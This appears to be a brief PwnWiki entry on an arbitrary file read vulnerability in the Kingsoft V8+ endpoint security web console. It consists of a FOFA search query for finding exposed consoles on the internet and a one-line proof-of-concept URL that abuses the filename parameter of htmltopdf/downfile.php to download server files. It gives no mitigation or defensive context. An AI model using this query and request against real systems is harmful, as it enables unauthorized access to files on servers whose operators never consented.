金山 V8 終端安全系統 任意文件讀取漏洞

From PwnWiki

FOFA

title="在线安装-V8+终端安全系统Web控制台"

POC

http://xxx.xxx.xxx.xxx/htmltopdf/downfile.php?filename=downfile.php